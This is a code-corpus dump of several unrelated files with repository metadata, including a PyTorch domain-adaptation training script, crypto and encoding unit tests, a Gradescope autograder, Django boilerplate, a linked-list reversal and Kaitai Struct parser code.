loss_d_ = loss_d(1 - scores, torch.ones_like(scores)) - 0.1 * torch.sum(
(feature_fooling_tgt - feature_fooling_tgt0) * (feature_fooling_tgt - feature_fooling_tgt0))
feature_fooling_tgt.retain_grad()
loss_d_.backward()
# get grad
g = feature_fooling_tgt.grad
feature_fooling_tgt = feature_fooling_tgt + 2*g
# optimizer_d.step()
                # obtain the updated images
feature_fooling_tgt = Variable(feature_fooling_tgt, requires_grad=True)
for i_s in range(train_epochs[2]):
                # Source Domain - Discriminator
                # update feature_fooling_src
discriminator.zero_grad()
classifier.zero_grad()
scores = discriminator(feature_fooling_src)
loss_d_ = loss_d(scores, torch.ones_like(scores)) - 0.1 * torch.sum(
(feature_fooling_src - feature_fooling_src0) * (feature_fooling_src - feature_fooling_src0))
feature_fooling_src.retain_grad()
loss_d_.backward()
gss = feature_fooling_src.grad
feature_fooling_src = feature_fooling_src + 2*gss
# optimizer_d.step()
feature_fooling_src = Variable(feature_fooling_src, requires_grad=True)
for i_c in range(train_epochs[3]):
                # Source Domain - Classifier
                # the updated feature_fooling_src must still be classified correctly
discriminator.zero_grad()
classifier.zero_grad()
pred = classifier.forward(feature_fooling_src)
loss_c_ = loss_c(pred, labels_src) - 0.1 * torch.sum(
(feature_fooling_src - feature_fooling_src0) * (feature_fooling_src - feature_fooling_src0))
loss_c_.backward()
gs = feature_fooling_src.grad
feature_fooling_src = feature_fooling_src + 3 * gs
feature_fooling_src = Variable(feature_fooling_src, requires_grad=True)
            # forward pass
feature_src = Variable(
imgs_src.type(FloatTensor), requires_grad=False).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
feature_tgt = Variable(
imgs_tgt.type(FloatTensor), requires_grad=False).reshape(imgs_tgt.shape[0], -1)
labels_tgt = Variable(labels_tgt.type(LongTensor))
# classifier output
predict_prob_src = classifier(feature_src)
predict_prob_tgt = classifier(feature_tgt)
# discriminator output
domain_src = discriminator(feature_src)
domain_tgt = discriminator(feature_tgt)
domain_f_tgt = discriminator(feature_fooling_tgt)
domain_f_src = discriminator(feature_fooling_src)
            # compute the domain losses
domain_label_src = Variable(FloatTensor(imgs_src.size(0), 1).fill_(domain_label[0]))
domain_label_tgt = Variable(FloatTensor(imgs_tgt.size(0), 1).fill_(domain_label[1]))
domain_label_f_src = Variable(FloatTensor(imgs_src.size(0), 1).fill_(domain_label[2]))
domain_label_f_tgt = Variable(FloatTensor(imgs_tgt.size(0), 1).fill_(domain_label[3]))
dloss_f = (loss_d(domain_f_src.detach(), domain_label_f_src) +
loss_d(domain_f_tgt.detach(), domain_label_f_tgt))
dloss = loss_d(domain_src, domain_label_src) + \
loss_d(domain_tgt, domain_label_tgt)
# loss_c_src = loss_c(predict_prob_src, labels_src) + loss_c(predict_prob_tgt, labels_tgt)
loss_c_src = loss_c(predict_prob_src, labels_src)
entropy = entropy_loss(predict_prob_tgt)
            # losses on the newly generated (updated) images
predict_prob_f_src = classifier(feature_fooling_src)
predict_prob_f_tgt = classifier(feature_fooling_tgt)
dis = torch.sum((predict_prob_f_tgt - predict_prob_tgt) *
(predict_prob_f_tgt - predict_prob_tgt))
loss_c_f_src = loss_c(predict_prob_f_src, labels_src)
with OptimizerManager([optimizer_c, optimizer_d]):
loss = loss_weight[0] * loss_c_src + loss_weight[1] * dloss + loss_weight[2] * dloss_f + \
loss_weight[3] * loss_c_f_src + loss_weight[4] * dis + loss_weight[5] * entropy
loss.backward()
if epoch % 20 == 0:
                # print the source-domain accuracy here as well.
                # target-domain accuracy was initially withheld because results were still poor.
predict_prob_src, predict_prob_tgt = classifier(feature_src), classifier(feature_tgt)
pred_src, pred_tgt = predict_prob_src.data.max(1)[1], predict_prob_tgt.data.max(1)[1]
acc_src, acc_tgt = pred_src.eq(labels_src.data).cpu().sum(), pred_tgt.eq(labels_tgt.data).cpu().sum()
print(
"[Epoch {:d}/{:d}] [Batch {:d}/{:d}] [C loss: src:{:.3f}, f_src:{:.3f}] "
"[D loss src:{:.3f} f_src:{:.3f}] [Acc src:{:.2%} tgt:{:.2%}]"
"[dis:{:.3f} entropy:{:.3f}]"
.format(epoch, train_epochs[0],
st, len_dataloader,
loss_c_src.item(), loss_c_f_src.item(),
dloss.item(), dloss_f.item(),
int(acc_src) / 100, int(acc_tgt) / 100,
dis, entropy)
)
if epoch % 50 == 0:
acc_src = 0
for (imgs_src, labels_src) in dataloader_src:
feature_src = Variable(imgs_src.type(FloatTensor)).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
predict_prob_src = classifier(feature_src)
pred_src = predict_prob_src.data.max(1)[1]
acc_src += pred_src.eq(labels_src.data).cpu().sum()
print('epoch={}, src_acc={}'.format(epoch, int(acc_src) / len(dataloader_src.dataset)))
        # save the checkpoint files plus the distance/loss data (for plotting).
# if epoch % 100 == 0 and epoch != 0:
# state = {'classifier': classifier.state_dict(), 'discriminator': discriminator.state_dict()}
# torch.save(state, '../pth/classifier_discriminator_{}.pth'.format(epoch))
# state = {'sample_distance_src': sample_distance_src, 'sample_distance_tgt': sample_distance_tgt,
# 'discriminator_loss': discriminator_loss, 'discriminator_f_loss': discriminator_f_loss,
# 'classifier_loss': classifier_loss, 'classifier_f_loss': classifier_f_loss,
# 'epochs': epochs}
# torch.save(state, '../pth/figure.pth')
def train_generate_samples(discriminator, classifier, dataloader_src, dataloader_tgt, train_epochs, domain_label,
loss_weight, save_samples_epoch):
"""
    Purpose: generate image samples; other functionality is ignored for now.
    Image generation starts after 100 iterations.
"""
os.makedirs('../generate_samples/A_C', exist_ok=True)
discriminator.train()
classifier.train()
loss_d = torch.nn.BCELoss()
loss_c = torch.nn.CrossEntropyLoss()
scheduler = lambda step, initial_lr: inverseDecaySheduler(step, initial_lr, gamma=10, power=0.75, max_iter=3000)
optimizer_c = OptimWithSheduler(optim.Adam(classifier.parameters(), weight_decay=5e-4, lr=1e-5),
scheduler)
optimizer_d = OptimWithSheduler(optim.Adam(discriminator.parameters(), weight_decay=5e-4, lr=1e-5),
scheduler)
len_dataloader = min(len(dataloader_src), len(dataloader_tgt))
for epoch in range(train_epochs[0]):
start = time.time()
data_zip = enumerate(zip(dataloader_src, dataloader_tgt))
for st, ((imgs_src, labels_src), (imgs_tgt, labels_tgt)) in data_zip:
# adjust_lr(optimizer_c, step, optimizer_c.param_groups[0]['lr'])
# adjust_lr(optimizer_d, step, optimizer_d.param_groups[0]['lr'])
# =========================generate transferable examples
feature_fooling_src = Variable(
imgs_src.type(FloatTensor), requires_grad=True).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
            feature_fooling_src0 = feature_fooling_src.detach()  # keep the original source images for reference
            feature_fooling_tgt = Variable(
                imgs_tgt.type(FloatTensor), requires_grad=True).reshape(imgs_tgt.shape[0], -1)
            feature_fooling_tgt0 = feature_fooling_tgt.detach()  # keep the original target images for reference
for i_t in range(train_epochs[1]):
                # Target Domain
                # update feature_fooling_tgt via gradient ascent on the discriminator loss
discriminator.zero_grad()
classifier.zero_grad()
scores = discriminator(feature_fooling_tgt)
loss_d_ = loss_d(1 - scores, torch.ones_like(scores)) - 0.1 * torch.sum(
(feature_fooling_tgt - feature_fooling_tgt0) * (feature_fooling_tgt - feature_fooling_tgt0))
feature_fooling_tgt.retain_grad()
loss_d_.backward()
# get grad
g = feature_fooling_tgt.grad
feature_fooling_tgt = feature_fooling_tgt + 2*g
# optimizer_d.step()
                # obtain the updated images
feature_fooling_tgt = Variable(feature_fooling_tgt, requires_grad=True)
tgt_imgs_f = feature_fooling_tgt.reshape(feature_fooling_tgt.shape[0], 3, params.imgs_size, params.imgs_size)
for i_s in range(train_epochs[2]):
                # Source Domain - Discriminator
                # update feature_fooling_src
discriminator.zero_grad()
classifier.zero_grad()
scores = discriminator(feature_fooling_src)
loss_d_ = loss_d(scores, torch.ones_like(scores)) - 0.1 * torch.sum(
(feature_fooling_src - feature_fooling_src0) * (feature_fooling_src - feature_fooling_src0))
feature_fooling_src.retain_grad()
loss_d_.backward()
gss = feature_fooling_src.grad
feature_fooling_src = feature_fooling_src + 2*gss
# optimizer_d.step()
feature_fooling_src = Variable(feature_fooling_src, requires_grad=True)
src_imgs_c = feature_fooling_src.reshape(feature_fooling_src.shape[0], 3, params.imgs_size, params.imgs_size)
for i_c in range(train_epochs[3]):
                # Source Domain - Classifier
                # the updated feature_fooling_src must still be classified correctly
discriminator.zero_grad()
classifier.zero_grad()
pred = classifier.forward(feature_fooling_src)
loss_c_ = loss_c(pred, labels_src) - 0.1 * torch.sum(
(feature_fooling_src - feature_fooling_src0) * (feature_fooling_src - feature_fooling_src0))
loss_c_.backward()
gs = feature_fooling_src.grad
feature_fooling_src = feature_fooling_src + 3 * gs
feature_fooling_src = Variable(feature_fooling_src, requires_grad=True)
src_imgs_d = feature_fooling_src.reshape(feature_fooling_src.shape[0], 3, params.imgs_size, params.imgs_size)
            # forward pass
feature_src = Variable(
imgs_src.type(FloatTensor), requires_grad=False).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
feature_tgt = Variable(
imgs_tgt.type(FloatTensor), requires_grad=False).reshape(imgs_tgt.shape[0], -1)
labels_tgt = Variable(labels_tgt.type(LongTensor))
# classifier output
predict_prob_src = classifier(feature_src)
predict_prob_tgt = classifier(feature_tgt)
# discriminator output
domain_src = discriminator(feature_src)
domain_tgt = discriminator(feature_tgt)
domain_f_tgt = discriminator(feature_fooling_tgt)
domain_f_src = discriminator(feature_fooling_src)
            # compute the domain losses
domain_label_src = Variable(FloatTensor(imgs_src.size(0), 1).fill_(domain_label[0]))
domain_label_tgt = Variable(FloatTensor(imgs_tgt.size(0), 1).fill_(domain_label[1]))
domain_label_f_src = Variable(FloatTensor(imgs_src.size(0), 1).fill_(domain_label[2]))
domain_label_f_tgt = Variable(FloatTensor(imgs_tgt.size(0), 1).fill_(domain_label[3]))
dloss_f = (loss_d(domain_f_src.detach(), domain_label_f_src) +
loss_d(domain_f_tgt.detach(), domain_label_f_tgt))
dloss = loss_d(domain_src, domain_label_src) + \
loss_d(domain_tgt, domain_label_tgt)
# loss_c_src = loss_c(predict_prob_src, labels_src) + loss_c(predict_prob_tgt, labels_tgt)
loss_c_src = loss_c(predict_prob_src, labels_src)
entropy = entropy_loss(predict_prob_tgt)
            # losses on the newly generated (updated) images
predict_prob_f_src = classifier(feature_fooling_src)
predict_prob_f_tgt = classifier(feature_fooling_tgt)
dis = torch.sum((predict_prob_f_tgt - predict_prob_tgt) *
(predict_prob_f_tgt - predict_prob_tgt))
loss_c_f_src = loss_c(predict_prob_f_src, labels_src)
with OptimizerManager([optimizer_c, optimizer_d]):
loss = loss_weight[0] * loss_c_src + loss_weight[1] * dloss + loss_weight[2] * dloss_f + \
loss_weight[3] * loss_c_f_src + loss_weight[4] * dis + loss_weight[5] * entropy
loss.backward()
# if (epoch+1) % 10 == 0:
            # #     print the source-domain accuracy here as well.
            # #     target-domain accuracy was initially withheld because results were still poor.
# predict_prob_src, predict_prob_tgt = classifier(feature_src), classifier(feature_tgt)
# pred_src, pred_tgt = predict_prob_src.data.max(1)[1], predict_prob_tgt.data.max(1)[1]
# acc_src, acc_tgt = pred_src.eq(labels_src.data).cpu().sum(), pred_tgt.eq(labels_tgt.data).cpu().sum()
# print(
# "[Epoch {:d}/{:d}] [Batch {:d}/{:d}] [C loss: src:{:.3f}, f_src:{:.3f}] "
# "[D loss src:{:.3f} f_src:{:.3f}] [Acc src:{:.2%} tgt:{:.2%}]"
# "[dis:{:.3f} entropy:{:.3f}]"
# .format(epoch, train_epochs[0],
# st, len_dataloader,
# loss_c_src.item(), loss_c_f_src.item(),
# dloss.item(), dloss_f.item(),
# int(acc_src) / 100, int(acc_tgt) / 100,
# dis, entropy)
# )
if epoch >= save_samples_epoch:
# Save samples
                # five parts in total: src_imgs, src_f_imgs_d, src_f_imgs_c, tgt_imgs, tgt_f_imgs
src_imgs = feature_src.reshape(feature_src.shape[0], 3, params.imgs_size, params.imgs_size)
tgt_imgs = feature_tgt.reshape(feature_tgt.shape[0], 3, params.imgs_size, params.imgs_size)
generate_imgs = torch.cat((src_imgs[10:30], src_imgs_d[10:30], src_imgs_c[10:30],
tgt_imgs[10:30], tgt_imgs_f[10:30]), 0)
save_image(generate_imgs, '../generate_samples/A_C/{}.png'.format(epoch), nrow=20, normalize=True)
print('epoch = {} Save samples!'.format(epoch))
def evaluate(classifier, dataloader_src, dataloader_tgt):
    # only the target dataloader is strictly needed here
classifier.eval()
acc_src = acc_tgt = 0
for (imgs_tgt, labels_tgt) in dataloader_tgt:
feature_tgt = Variable(imgs_tgt.type(FloatTensor).expand(
imgs_tgt.shape[0], 3, params.imgs_size, params.imgs_size), requires_grad=False).reshape(imgs_tgt.shape[0], -1)
labels_tgt = Variable(labels_tgt.type(LongTensor))
predict_prob_tgt = classifier(feature_tgt)
pred_tgt = predict_prob_tgt.data.max(1)[1]
acc_tgt += pred_tgt.eq(labels_tgt.data).cpu().sum()
for (imgs_src, labels_src) in dataloader_src:
feature_src = Variable(imgs_src.type(FloatTensor)).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
predict_prob_src = classifier(feature_src)
pred_src = predict_prob_src.data.max(1)[1]
acc_src += pred_src.eq(labels_src.data).cpu().sum()
acc_src = int(acc_src) / len(dataloader_src.dataset)
acc_tgt = int(acc_tgt) / len(dataloader_tgt.dataset)
print("Src Accuracy = {:2%}, Tgt Accuracy = {:2%}".format(acc_src, acc_tgt))
def train_classifier(classifier, dataloader_src):
    # standalone sanity test of the classifier
optimizer = optim.Adam(classifier.parameters(), lr=params.learning_rate,
betas=(params.beta1, params.beta2))
loss_c = nn.CrossEntropyLoss()
for epoch in range(params.classifier_epochs):
data_zip = enumerate(dataloader_src)
for step, (imgs_src, labels_src) in data_zip:
# adjust_lr(optimizer, step, optimizer.param_groups[0]['lr'])
feature_src = Variable(imgs_src.type(FloatTensor), requires_grad=False).reshape(imgs_src.shape[0],
-1)
labels_src = Variable(labels_src.type(LongTensor))
# feature_tgt = Variable(imgs_tgt.type(FloatTensor), requires_grad=True).reshape(imgs_tgt.shape[0],
# -1)
# labels_tgt = Variable(labels_tgt.type(LongTensor))
# with OptimizerManager([optimizer]):
# loss = loss_c(classifier(feature_src), labels_src)
# loss.backward()
optimizer.zero_grad()
loss = loss_c(classifier(feature_src), labels_src)
loss.backward()
optimizer.step()
if epoch % 20 == 0:
predict_prob_src = classifier(feature_src)
pred_src = predict_prob_src.data.max(1)[1]
acc_src = pred_src.eq(labels_src.data).cpu().sum()
print('acc:{:.3%}'.format(int(acc_src) / imgs_src.shape[0]))
torch.save(classifier.state_dict(), '../pth/classifier_src.pth')
if __name__ == '__main__':
from models import networks
from Images import data_preprocess
from torch.backends import cudnn
torch.backends.cudnn.benchmark = True
# get dataloader
amazon_path = os.path.join(params.imgs_root_path, r'amazon\images')
dslr_path = os.path.join(params.imgs_root_path, r'dslr\images')
webcam_path = os.path.join(params.imgs_root_path, r'webcam\images')
caltech_path = os.path.join(params.imgs_root_path, r'Clatech\clatech')
    # target domain not used here
amazon_dataloader = data_preprocess.get_dataloader(amazon_path, params.images_name)
dslr_dataloader = data_preprocess.get_dataloader(dslr_path, params.images_name)
webcam_dataloader = data_preprocess.get_dataloader(webcam_path, params.images_name)
caltech_dataloader = data_preprocess.get_dataloader(caltech_path, params.images_name)
    # variant with a labeled target domain:
    # amazon_dataloader, dslr_dataloader = data_preprocess.get_src_tgt_dataloader(amazon_path, dslr_path, params.images_name)
    # initialize the networks
classifier = networks.Classifier(3*params.imgs_size*params.imgs_size, len(params.images_name)).cuda()
discriminator = networks.LargeDiscriminator(3*params.imgs_size*params.imgs_size).cuda()
    # training schedule: total epochs, tgt-discriminator steps, src-discriminator steps, src-classifier steps
train_epochs = [200, 20, 20, 20]
# domain label
domain_label = [1.0, 0.0, 1.0, 0.0]
    # loss weights: loss_c_src + dloss + dloss_f + loss_c_f_src + dis + entropy
loss_weight = [1, 0.5, 0.5, 1.0, 1.0, 0.1]
save_samples_epoch = 0
train(discriminator, classifier, amazon_dataloader, dslr_dataloader, train_epochs, domain_label, loss_weight)
# train_generate_samples(discriminator, classifier, amazon_dataloader, caltech_dataloader, train_epochs, domain_label,
# loss_weight, save_samples_epoch)
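# --- Editor's sketch of the core update used above, in isolation ---
# Each "transferable example" step ascends the gradient of an objective of the
# form loss(x) - reg * ||x - x0||^2 with respect to the input x. Names below are
# illustrative only (this is an assumed simplification, not project code):
def _ascent_step(x, x0, model, criterion, target, step=2.0, reg=0.1):
    x = x.clone().detach().requires_grad_(True)
    objective = criterion(model(x), target) - reg * torch.sum((x - x0) ** 2)
    objective.backward()
    return (x + step * x.grad).detach()  # move x toward higher objective value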
|
[
"cccht619@gmail.com"
] |
cccht619@gmail.com
|
f833a0147426e6839d8c6c4b94930e3deef2695a
|
014f6b3b5dc7cb79ff76a3dec7251a4845298eee
|
/openpbp/test/test_asymmetric.py
|
3fcda6d873c1e69d0e00fead4dc1b825822ef2bd
|
[] |
no_license
|
shawa/pretty-bad-privacy
|
39f14e19d9e2948c154a2dc4e3691b7d55999e4f
|
16cc9a88b91c39f12a8fe472c89bed6bb71563d7
|
refs/heads/master
| 2021-01-10T03:48:03.384171
| 2016-04-04T12:17:04
| 2016-04-04T12:17:04
| 55,063,568
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
import unittest
import asymmetric
import os
import sys
from hypothesis import given, settings
from hypothesis.strategies import binary
import cryptography.hazmat.backends.openssl
class TestAsymmetric(unittest.TestCase):
def setUp(self):
self.kp = asymmetric.gen_keypair()
    def test_gen_keypair(self):
        self.assertIsNotNone(self.kp.pubkey)
        self.assertIsNotNone(self.kp.privkey)
def test__load_pubkey(self):
pubkey_pem = self.kp.pubkey
key = asymmetric._load_pubkey(pubkey_pem)
self.assertIsNotNone(key)
def test__load_privkey(self):
privkey_pem = self.kp.privkey
key = asymmetric._load_privkey(privkey_pem)
self.assertIsNotNone(key)
@given(binary())
def test_encrypt_decrypt(self, plaintext):
ciphertext = asymmetric.encrypt(plaintext, self.kp.pubkey)
self.assertIsNotNone(ciphertext)
decrypted = asymmetric.decrypt(ciphertext, self.kp.privkey)
self.assertEqual(plaintext, decrypted)
@given(binary(min_size=1))
def test_sign_verify(self, message):
sig = asymmetric.sign(message, self.kp.privkey)
valid = asymmetric.verify(message, sig, self.kp.pubkey)
self.assertTrue(valid)
if __name__ == '__main__':
unittest.main()
|
[
"shawa1@tcd.ie"
] |
shawa1@tcd.ie
|
916db4106bd8791b8f778270d70db8aec40fd37f
|
ac388c2af5405284700cf3531f3b711c3974db75
|
/main/__init__.py
|
4a553f72b8d27e61c39dcae77964fd3ee9fb5a19
|
[] |
no_license
|
jimapple/Bitcorn_demo
|
1332403b285754996da7b88ca320b155f9a76147
|
d93393a61e2bca63d58595921d27a7d11ec164e8
|
refs/heads/master
| 2021-08-24T00:30:07.214856
| 2017-12-07T08:21:02
| 2017-12-07T08:21:02
| 113,412,642
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 44
|
py
|
__all__ = [
'bitcorn',
'u_bitcorn'
]
|
[
"609127041@qq.com"
] |
609127041@qq.com
|
53aa1b185bea2ffed12ea857520aadb1e656777e
|
63fb1e770ee4314d02acf14291cf71d466e4997b
|
/test/integration/autograder-correct/run_autograder
|
1b2b8f9eaf187dc834258e8a9e631da1b27c6d26
|
[
"BSD-3-Clause"
] |
permissive
|
TylerADavis/otter-grader
|
8266f75bbb7ee848bcef143b94b6c67bcae76ad7
|
9f245a13022b15a20a8340140a9084c550cfba80
|
refs/heads/master
| 2021-01-16T13:56:59.181420
| 2020-02-25T21:14:29
| 2020-02-25T21:14:29
| 243,145,370
| 0
| 0
|
BSD-3-Clause
| 2020-02-26T02:00:44
| 2020-02-26T02:00:44
| null |
UTF-8
|
Python
| false
| false
| 2,677
|
#!/usr/bin/env python3
from otter.grade import grade_notebook
from glob import glob
import json
import os
import shutil
import subprocess
import re
import pprint
import pandas as pd
SCORE_THRESHOLD = None
POINTS_POSSIBLE = None
UTILS_IMPORT_REGEX = r"\"from utils import [\w\*, ]+"
NOTEBOOK_INSTANCE_REGEX = r"otter.Notebook\(.+\)"
if __name__ == "__main__":
# put files into submission directory
if os.path.exists("/autograder/source/files"):
for filename in glob("/autograder/source/files/*.*"):
shutil.copy(filename, "/autograder/submission")
# create __init__.py files
subprocess.run(["touch", "/autograder/__init__.py"])
subprocess.run(["touch", "/autograder/submission/__init__.py"])
os.chdir("/autograder/submission")
# check for *.ipynb.json files
jsons = glob("*.ipynb.json")
for file in jsons:
shutil.copy(file, file[:-5])
nb_path = glob("*.ipynb")[0]
# fix utils import
try:
with open(nb_path) as f:
contents = f.read()
except UnicodeDecodeError:
with open(nb_path, "r", encoding="utf-8") as f:
contents = f.read()
contents = re.sub(UTILS_IMPORT_REGEX, "\"from .utils import *", contents)
contents = re.sub(NOTEBOOK_INSTANCE_REGEX, "otter.Notebook()", contents)
try:
with open(nb_path, "w") as f:
f.write(contents)
except UnicodeEncodeError:
with open(nb_path, "w", encoding="utf-8") as f:
f.write(contents)
try:
os.mkdir("/autograder/submission/tests")
except FileExistsError:
pass
tests_glob = glob("/autograder/source/tests/*.py")
for file in tests_glob:
shutil.copy(file, "/autograder/submission/tests")
scores = grade_notebook(nb_path, tests_glob, name="submission", ignore_errors=True, gradescope=True)
# del scores["TEST_HINTS"]
output = {"tests" : []}
for key in scores:
if key != "total" and key != "possible":
output["tests"] += [{
"name" : key,
"score" : scores[key]["score"],
"possible": scores[key]["possible"],
"visibility": ("visible", "hidden")[scores[key]["hidden"]]
}]
if "hint" in scores[key]:
output["tests"][-1]["output"] = repr(scores[key]["hint"])
output["visibility"] = "hidden"
if POINTS_POSSIBLE is not None:
output["score"] = scores["total"] / scores["possible"] * POINTS_POSSIBLE
if SCORE_THRESHOLD is not None:
if scores["total"] / scores["possible"] >= SCORE_THRESHOLD:
output["score"] = POINTS_POSSIBLE or scores["possible"]
else:
output["score"] = 0
with open("/autograder/results/results.json", "w+") as f:
json.dump(output, f)
print("\n\n")
df = pd.DataFrame(output["tests"])
if "output" in df.columns:
df.drop(columns=["output"], inplace=True)
# df.drop(columns=["hidden"], inplace=True)
print(df)
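# For reference (editor's addition): the results.json written above follows
# Gradescope's schema; with the keys built in this script it looks like:
#
#     {
#       "tests": [{"name": "q1", "score": 1.0, "possible": 1.0,
#                  "visibility": "visible"}],
#       "visibility": "hidden",
#       "score": 10
#     }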
|
[
"cpyles@berkeley.edu"
] |
cpyles@berkeley.edu
|
|
406885e2bae201a8afd06ed96e97034725edb058
|
904985f94f055f758f1848d791ca0919d0a1854a
|
/tests/test_conservation.py
|
040d99f5193fde4b43003ae22ed481e7c9128778
|
[] |
no_license
|
Sigmanificient/XCrypt
|
b3b8212d41441c5515177e33127668d0f0860da5
|
a9d5af9e5d0f8eb93b32e18b1b85fcc826ac1e15
|
refs/heads/master
| 2023-07-08T19:32:05.299434
| 2021-08-17T23:14:46
| 2021-08-17T23:14:46
| 397,388,757
| 1
| 0
| null | 2021-08-17T21:33:29
| 2021-08-17T20:54:43
|
Python
|
UTF-8
|
Python
| false
| false
| 599
|
py
|
import os
import random
import string
import unittest
import xcrypt
class MyTestCase(unittest.TestCase):
def test_conservation(self):
key = xcrypt.make_key()
for _ in range(100):
seq = ''.join(random.choice(string.hexdigits) for _ in range(500))
enc: str = xcrypt.encode(key, seq)
self.assertEqual(xcrypt.decode(key, enc), seq)
@classmethod
def tearDownClass(cls) -> None:
for file in os.listdir('.'):
if file.endswith('.key'):
os.remove(file)
if __name__ == '__main__':
unittest.main()
|
[
"edhyjox@gmail.com"
] |
edhyjox@gmail.com
|
8d2ca06eeba361ebe34feef3996b6e6043773d1a
|
53fdf4ae35af6884445929d576869ff6627a8b50
|
/manage.py
|
6095b2aa60a0a55a9e0ba619d51f9e028e9bc7b9
|
[] |
no_license
|
kippum99/Glimpse
|
bd50a4cdd32ffdeafefdc7a6a894a1c091627c7d
|
f60b055dc58ab223e9c40463b637588cee1789b1
|
refs/heads/master
| 2020-03-27T20:43:51.376146
| 2018-10-24T05:54:22
| 2018-10-24T05:54:22
| 147,089,994
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Glimpse.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"junekim@Junes-MacBook-Pro.local"
] |
junekim@Junes-MacBook-Pro.local
|
0d297e9b1049c217cc4d0021507feaa54bc8184c
|
989936aecaa9304c8aa2dd329fce29c8456a2b2a
|
/OculusServer/wsgi.py
|
8cbf6dd042f21434f2f8473000669be70fc89167
|
[
"Apache-2.0"
] |
permissive
|
edisonzhao/OculusServer
|
ab167163bf8491c01d6b2729d632be934c625d48
|
0337637f27d47991fdaf4e0f0612bac9400ac554
|
refs/heads/master
| 2016-08-11T09:00:47.434542
| 2015-10-25T04:58:57
| 2015-10-25T04:58:57
| 44,896,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
"""
WSGI config for OculusServer project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "OculusServer.settings")
application = get_wsgi_application()
|
[
"edisonzyzhao@gmail.com"
] |
edisonzyzhao@gmail.com
|
a572021fd04c049baa3315bbf6f3cc257cbe07b2
|
2d8695c2b7f9418b34c4934a5d827079466f26fa
|
/linkedlist/singly/reverse.py
|
a27f8b5366a31f399fb0c48b2f6c3c936f9b491f
|
[] |
no_license
|
obaid147/python_ds_algos
|
9dc8fc85ae625c5a39044fd028f4b79d6157921c
|
39303908a4462ef285e65043a151ac26b2baa311
|
refs/heads/master
| 2022-11-26T07:54:37.107871
| 2020-08-03T07:02:11
| 2020-08-03T07:02:11
| 257,626,023
| 1
| 1
| null | 2020-05-13T15:26:01
| 2020-04-21T14:42:31
|
Python
|
UTF-8
|
Python
| false
| false
| 710
|
py
|
class Node:
def __init__(self, data):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None
# Time Complexity --> O(n)
def reverseLinkedList(self):
if not self.head:
return
prev_Node = None
current = self.head
while current:
next_Node = current.next
# break link
current.next = prev_Node
# new node
prev_Node = current
current = next_Node
self.head = prev_Node
ll = SinglyLinkedList()
ll.head = Node(1)
second = Node(2)
third = Node(3)
ll.head.next = second
second.next = third
ll.reverseLinkedList()
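# Editor's verification sketch: traverse the reversed list; expected output 3 2 1.
node = ll.head
while node:
    print(node.data)
    node = node.next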
|
[
"obaidfayazwani@gmail.com"
] |
obaidfayazwani@gmail.com
|
f909d3411cd6dc6251fe0b423103760cc9ea7593
|
924763dfaa833a898a120c411a5ed3b2d9b2f8c7
|
/compiled/python/params_pass_bool.py
|
00502f37c5eb03db1dc7240108d5760495a113e3
|
[
"MIT"
] |
permissive
|
kaitai-io/ci_targets
|
31257dfdf77044d32a659ab7b8ec7da083f12d25
|
2f06d144c5789ae909225583df32e2ceb41483a3
|
refs/heads/master
| 2023-08-25T02:27:30.233334
| 2023-08-04T18:54:45
| 2023-08-04T18:54:45
| 87,530,818
| 4
| 6
|
MIT
| 2023-07-28T22:12:01
| 2017-04-07T09:44:44
|
C++
|
UTF-8
|
Python
| false
| false
| 2,429
|
py
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
# type: ignore
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
if getattr(kaitaistruct, 'API_VERSION', (0, 9)) < (0, 9):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class ParamsPassBool(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.s_false = self._io.read_bits_int_be(1) != 0
self.s_true = self._io.read_bits_int_be(1) != 0
self._io.align_to_byte()
self.seq_b1 = ParamsPassBool.ParamTypeB1(self.s_true, self._io, self, self._root)
self.seq_bool = ParamsPassBool.ParamTypeBool(self.s_false, self._io, self, self._root)
self.literal_b1 = ParamsPassBool.ParamTypeB1(False, self._io, self, self._root)
self.literal_bool = ParamsPassBool.ParamTypeBool(True, self._io, self, self._root)
self.inst_b1 = ParamsPassBool.ParamTypeB1(self.v_true, self._io, self, self._root)
self.inst_bool = ParamsPassBool.ParamTypeBool(self.v_false, self._io, self, self._root)
class ParamTypeB1(KaitaiStruct):
def __init__(self, arg, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.arg = arg
self._read()
def _read(self):
self.foo = self._io.read_bytes((1 if self.arg else 2))
class ParamTypeBool(KaitaiStruct):
def __init__(self, arg, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.arg = arg
self._read()
def _read(self):
self.foo = self._io.read_bytes((1 if self.arg else 2))
@property
def v_false(self):
if hasattr(self, '_m_v_false'):
return self._m_v_false
self._m_v_false = False
return getattr(self, '_m_v_false', None)
@property
def v_true(self):
if hasattr(self, '_m_v_true'):
return self._m_v_true
self._m_v_true = True
return getattr(self, '_m_v_true', None)
|
[
"kaitai-bot@kaitai.io"
] |
